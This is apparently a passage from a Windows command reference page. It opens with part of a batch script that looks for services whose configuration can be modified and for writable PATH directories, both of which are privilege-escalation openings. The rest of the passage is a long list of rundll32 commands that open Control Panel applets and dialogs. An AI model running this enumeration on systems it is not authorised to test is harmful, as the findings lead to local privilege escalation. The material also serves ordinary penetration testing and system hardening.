set str=%%i
set str=!str:~1!
for /f "tokens=4" %%e in ('sc qc "!str!" ^| findstr "ERROR\_CONTROL"') do (
set errCtrl=%%e
sc config "!str!" error= !errCtrl! > nul && (
echo Vulnerable service found: !str!
)
)
)
REM =================================================
REM = Check for write access to directories in PATH =
REM =================================================
echo(
echo Finding write access in PATH directories...
echo(
REM http://stackoverflow.com/a/14879373
for %%A in ("%path:;=";"%") do (
set filename=%%~A\\dll-write-check.txt
copy /y nul "!filename!" > nul 2>&1 && (
del "!filename!"
echo Writable path directory found: %%A
)
)
Control Pannel from Command Line¶
Control Panel:
rundll32.exe shell32.dll,Control_RunDLL
Accessability Settings (ACCESS.CPL)¶
Accessability Properties (Keyboard):
rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1
Accessability Properties (Sound):
rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2
Accessability Properties (Display):
rundll32.exe shell32.dll,Control_RunDLL access.cpl,,3
Accessability Properties (Mouse):
rundll32.exe shell32.dll,Control_RunDLL access.cpl,,4
Accessability Properties (General):
rundll32.exe shell32.dll,Control_RunDLL access.cpl,,5
Add/Remove Programs (APPWIZ.CPL)¶
Add/Remove Programs Properties (Install/Uninstall):
rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,1
Add/Remove Programs Properties (Windows Setup):
rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,2
Add/Remove Programs Properties (Startup Disk):
rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,3
Display Settings (DESK.CPL)¶
Display Properties (Background):
rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0
Display Properties (Screen Saver):
rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1
Display Properties (Appearance):
rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2
Display Properties (Settings):
rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3
Display Properties (Install Screen Saver):
rundll32.exe desk.cpl,InstallScreenSaver %1
(opens .scr at location specified by %1 in preview window)
FindFast Settings (FINDFAST.CPL)¶
Find Fast Properties (General):
rundll32.exe shell32.dll,Control_RunDLL findfast.cpl
Internet Settings (INETCPL.CPL)¶
Internet Properties (General):
rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0
Internet Properties (Security):
rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,1
Internet Properties (Content):
rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,2
Internet Properties (Connection):
rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,3
Internet Properties (Programs):
rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,4
Internet Properties (Advanced):
rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,5
Regional Settings (INTL.CPL)¶
Regional Settings Properties (Regional Settings):
rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,0
Regional Settings Properties (Number):
rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,1
Regional Settings Properties (Currency):
rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,2
Regional Settings Properties (Time):
rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,3
Regional Settings Properties (Date):
rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,4
Regional Settings Properties (Input Locales):
rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,5
Joystick Settings (JOY.CPL)¶
Joystick Properties (Joystick):
rundll32.exe shell32.dll,Control_RunDLL joy.cpl
Mouse/Keyboard/Printers/Fonts Settings (MAIN.CPL)¶
Mouse Properties:
rundll32.exe shell32.dll,Control_RunDLL main.cpl @0
Keyboard Properties:
rundll32.exe shell32.dll,Control_RunDLL main.cpl @1
Printers:
rundll32.exe shell32.dll,Control_RunDLL main.cpl @2
Fonts:
rundll32.exe shell32.dll,Control_RunDLL main.cpl @3
Mail and Fax Settings (MLCFG32.CPL)¶
Microsoft Exchange/Outlook Properties (General):
rundll32.exe shell32.dll,Control_RunDLL mlcfg32.cpl
Multimedia/Sounds Settings (MMSYS.CPL)¶
Multimedia Properties (Audio):
rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,0
Multimedia Properties (Video):
rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,1
Multimedia Properties (MIDI):
rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,2
Multimedia Properties (CD Music):
rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,3
Multimedia Properties (Advanced/Devices):
rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,4
Sounds Properties:
rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl @1
Modem Settings (MODEM.CPL)¶
Modem Properties (General):
rundll32.exe shell32.dll,Control_RunDLL modem.cpl
Network Settings (NETCPL.CPL / NCPA.DLL)¶
Network (Configuration):
Win9x: rundll32.exe shell32.dll,Control_RunDLL netcpl.cpl
WinNT: rundll32.exe shell32.dll,Control_RunDLL ncpa.cpl
Dial-up Networking Wizard:
Win9x: rundll32.exe rnaui.dll,RnaWizard
Create Share Dialog:
WinNT: rundll32.exe ntlanui.dll,ShareCreate
Manage Shares Dialog:
WinNT: rundll32.exe ntlanui.dll,ShareManage
ODBC Settings (ODBCCP32.CPL)¶
ODBC Data Source Administrator (General):
rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl
Password Settings (PASSWORD.CPL)¶
Password Properties (Change Passwords):
Win9x: rundll32.exe shell32.dll,Control_RunDLL password.cpl
COM Ports Settings (PORTS.CPL)¶
COM Ports Properties (General):
WinNT: rundll32.exe shell32.dll,Control_RunDLL ports.cpl
Server Properties (SRVMGR.CPL)¶
Server Properties (General):
WinNT: rundll32.exe shell32.dll,Control_RunDLL srvmgr.cpl
System Settings (SYSDM.CPL)¶
System Properties (General):
rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,0
System Properties (Device Manager):
Win9x: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1
System Properties (Performance):
Win9x: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3
WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1
System Properties (Environment):
WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2
System Properties (Startup/Shutdown):
WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3
System Properties (Hardware Profiles):
Win95: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2
WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,4
System Properties (User Profiles):
WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,5
Add New Hardware Wizard:
Win9x: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl @1
Add New Printer Wizard:
Win9x: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL AddPrinter
Telephony Settings (TELEPHON.CPL)¶
Dialing Properties (My Location / Drivers):
WinNT: rundll32.exe shell32.dll,Control_RunDLL telephon.cpl
Themes Settings (THEMES.CPL)¶
Themes Properties (General):
rundll32.exe shell32.dll,Control_RunDLL themes.cpl
Time and Date Settings (TIMEDATE.CPL)¶
Date/Time Properties:
rundll32.exe shell32.dll,Control_RunDLL timedate.cpl
Choose Time Zone:
rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,/f
TweakUI Settings (TWEAKUI.CPL)¶
TweakUI Dialog (General):
rundll32.exe shell32.dll,Control_RunDLL tweakui.cpl
UPS Settings (UPS.CPL)¶
Uninteruptable Power Supply Properties (General):
WinNT: rundll32.exe shell32.dll,Control_RunDLL ups.cpl
Microsoft Mail Postoffice Settings (WGPOCPL.CPL)¶
Microsoft Workgroup Postoffice Admin:
rundll32.exe shell32.dll,Control_RunDLL wgpocpl.cpl
Miscellaneous File System Dialogs and Wizards¶
Open With (File Associations):
rundll32.exe shell32.dll,OpenAs_RunDLL d:\path\filename.ext
Run Diskcopy Dialog:
rundll32 diskcopy.dll,DiskCopyRunDll
Create New Shortcut Wizard:
rundll32.exe AppWiz.Cpl,NewLinkHere %1
(creates shortcut at location specified by %1)
Create a Briefcase:
rundll32.exe syncui.dll,Briefcase_Create
View Fonts:
rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder
View Printers:
rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL PrintersFolder